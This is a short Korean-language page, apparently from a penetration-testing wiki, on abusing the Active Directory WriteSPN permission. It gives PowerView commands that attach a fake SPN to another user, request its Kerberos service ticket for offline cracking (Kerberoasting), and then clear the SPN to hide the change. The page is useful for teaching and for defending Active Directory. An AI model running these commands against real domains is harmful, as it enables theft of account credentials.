WriteSPN

대상에 대해 WriteSPN 권한이 있는 경우 공격자는 대상을 주체로 도메인 SPN을 등록할 수 있습니다. SPN 등록 직후 서비스 티켓을 요청하여 커버로스팅 공격을 하고 SPN을 삭제합니다.

# 권한이 있는 사용자 개체 정보 변수화
$SecPassword = ConvertTo-SecureString <PASS> -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(contoso.com/user-A, $SecPassword)

# 도메인 객체 정보 저장
Set-DomainObject -Credential $Cred -Identity user-B -SET @{serviceprincipalname='nonexistent/HTTP'}

# SPN 등록
Get-DomainSPNTicket -Credential $Cred user-B | fl

# 공격 후 SPN 정리
Set-DomainObject -Credential $Cred -Identity user-B -Clear <SPN>

References

WriteSPN - SpecterOpsSpecterOps

PreviousGenericWrite NextWriteDACL

Last updated 4 months ago

hashtagReferences

References